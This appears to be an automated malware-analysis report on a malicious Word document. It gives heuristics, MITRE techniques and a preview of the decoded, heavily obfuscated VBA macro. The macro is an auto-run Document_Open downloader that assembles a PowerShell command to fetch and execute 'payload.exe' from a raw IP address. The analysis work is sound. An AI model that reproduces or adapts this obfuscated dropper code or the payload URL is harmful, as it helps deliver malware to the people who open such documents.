MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open macro that executes a Shell() command. This command constructs and runs a PowerShell command to download and execute a payload from the URL 'http://185.189.255.137/payload.exe'. The VBA code itself is obfuscated, but the reconstructed PowerShell command is clear. The presence of VBA macros and the execution of a remote payload strongly suggest a malicious document, likely delivered via spearphishing.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16991 bytes |
SHA-256: 18cfd33f2f0148d0ff94bf3baa649a2e017bed46b84665ed0d7dbfdc86a4274f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RChzliW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
QrYck = 11882 / WjDwSN - (KhzaSW + sHkZCM)
cYjoD = 64430 / nOFhfz - (mlXuM + akiFTp)
dzslqVsvKJ ("" + VQVECYJFNUv + CQjucDmVf + blZCdWHZO + DBZVs + roflTVj + jnXwjvQot + WGpNvbi + CfaHhJUkmk)
jDXtiH = 59731 / HwjkK - (oGQUp + dSjCh)
ObSFw = 85095 / iUNYKm - (zrSCiI + CshXTD)
End Sub
Attribute VB_Name = "jlhfpZul"
Function blZCdWHZO()
On Error Resume Next
dvWSK = (oPuhXq - aoGiRl)
LlHYk = (FzbUuo - mzKsK)
iQuNbLv = "pow" + iwilHAUD + McZQOoNsCpFtz + "ers" + twqjbYzY + YoZkovqBi + "h" + AYrpDtw + oBacOBi + "ell" + TPDGCqA + OuOsSaEt + " " + qXfwYMYXNwVmQT + OztVBpPl + "&" + rwjAYUb + ioQfuiTmrmcd + " " + GLFzFwBHuOTVcn + BLlmNWwUzr + "( $" + YzHbvzc + VVifauBMY + "sh" + YSkQsJjjNlz + wjuGrZdLY + "el" + qCGmcwIbpCi + rjmPsbhVH + "Lid"
rzvUwY = 38481 / 952 + (FapCw - 13796 * 32357 - YYMTij)
oOkdmknNMS = "[1]" + NTwYJiiYvdBnc + dsIRtjSlKEzi + Chr(43) + "$" + MSfMKKADo + HiBdPpvHdqmXw + "SH" + uhlTMAa + KVaRGhZDNZmF + "El" + vPBaiXav + GQTRVjqjSSTtOd + "L" + QiKYczcaqDKawn + obLqOHidi + "Id" + zoBAXYiHrkIW + tbRYQkiJDFmSL + "[1" + AjqWNdlo + BNjQifFFDVjRF + "3]" + HqkwNFNAwr + ztKHnOkOW + Chr(43) + "'x" + YahMHMbjbXBFm + phnMhZaMFLtOt + "')(" + EwJwMWjsGo + cvwnXGuY + "n" + JQSzNbAOzij + CvooWIohY + "eW-" + wRHYVHwiR + tfOJFsrqocWbv + "Ob" + RYQOslFBzvUc + jBppNCJaNDwqh + "JE" + bpLfmqaNDlEod + lPzAEahmi + "cT " + qLMRBEjMYFI + AJnmEIOf + "s"
ShsjRO = 89938 / 7115 + (pMzOBl - 67446 * 99626 - QqIcS)
vmvhZ = 53738 / 89717 + (MukJYR - 96483 * 56270 - fGuAu)
VJIOW = 82339 / 80834 + (BfWcz - 42165 * 5788 - RVCHA)
HfXzYpBNDNw = "YS" + SMGwLwAAzuMQT + VEVHsvVd + "TE" + tcisfzvhVvJ + CFfVcFJmulNhD + "m." + jswjbUSTV + uQjzkwlKSC + "iO" + tYWqwrRLcU + cwaIZklJNIKsDw + "." + vsMQWTDLE + cEzranlVlX + "s" + iQDLkNdnBqBP + NbJvPDvQ + "t" + QQkFRbP + GdzSHTzbq + "re" + DhHRaJLqIYqS + vTdXVZaJvdiNJC + "Am" + cFzXCiJSf + ZjuQKtVMz + "rEA" + UsLtmin + JNrwlVi + "d" + KLsNKAaB + UnqdwYkELI + "ER" + fSHGMswfpKZ + HLHiLTkQTsMTk + "( " + ARXmQfjZFD + CiiKOqoqMdVA + "(" + OMavmbza + nnjIalBfXl + " ne"
jQabq = DdfXsw + fzPGc * 31349 - iqFnqO / CGiiK / VPlkw / 11079 * ublzFN
ohwcvB = 21222 / 45505 + (WzERUw - 20243 * 32225 - ibDFX)
Tkkrmtukntt = "W" + MzcGlcpKnkbR + BoiZoQMfKW + "-" + DFIhdHiSuhFDls + wLicuEkJXoR + "Ob" + jmGkrZkBGH + icUiinwqljzst + "JE" + VzJoqOuNuzTuTp + DKoMcQatAVZmz + "cT" + qqbOCzSdZ + ZiLtdBMuv + " " + oVFYQoV + QHmcEraW + "s" + hPYNqshHrXZC + lCFJihiHkfw + "yS" + jplaqCJApPHOfi + RiNPHqBmRsK + "tE" + itPYzwSFzj + dwmzvwzzdTwk + "m.I" + tnzJzsCbKWspi + XUzNhitPo + "o" + KJvLwiVJFfGnlG + lPFFPPi + ".C"
lwoSkQ = irWdY + mRpnb * 10060 - ZXbWj / hPEVLp / nKcBtO / 84491 * ROkRbI
hzNnT = NWRlE + DdWLnu * 73512 - potMNm / IrFFW / vWVzCK / 42189 * FjHJJd
zWVJzX = nDitf + aNTZij * 33894 - NGCbHA / PivbpM / HAzGHu / 99150 * YmXmps
rKujzVni = "OM" + djWJfsFBaj + fMjhmIG + "PRe" + ljQfjEmCD + QSbYAlQiPw + "SsI" + LsZXbbXUjrK + FdvoTwWYqoNkHh + "On" + clSJGEnKjLafo + HjbuHUpvzF + ".d" + DMnTuWcDGs + BqkHIXqjDPFAj + "e" + XnpUEAjjztrjJ + RPBktRkinaOV + "F" + GnmIiFQRXdqSG + QrhYVzpzv + "LAT" + nFCupiRvqFE + GSAsXubLwTW + "e" + zwqRorPDRLOd + AKwIMSDR + "StR" + zbBRPqljKJhVFZ + IboGlOjja + "e"
wEFww = ULFBCw + kUXHZl * 97422 - YzcCs / kazoQ / HmnNu / 34359 * GKodz
KJQdf = sTMpzo + ZiSidi * 9223 - qwKbd / LisSqO / aWufBc / 24484 * FYKnM
BjdlBnCX = "Am" + lADNbirYFc + NjlGNlj + "([" + jKMIZsAjVcVMvz + bohPOhkANwXZiQ + "s" + FXEqrFBqqokzYr + LKmwzKjwZLua + "y" + BEPVHXuiEVn + azkcWjnOXi + "sTe" + voGRfKa + nfkCjupcG + "M."
XKBKiF = mbVioJ + IkbNMs * 56481 - EipcY / hGiNPs / bvaiI / 16605 * iJWnm
IlIBo = YuhNia + VMjoRY * 21051 - VJnSA / mlzlQ / GsKfF / 54166 * mjnCIE
cazkzWsd = "IO" + avssDVF + FhSEUrVZRW + "." + AiDjXTvMCqXHi + VWptVcFdbqAN + "M" + NU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.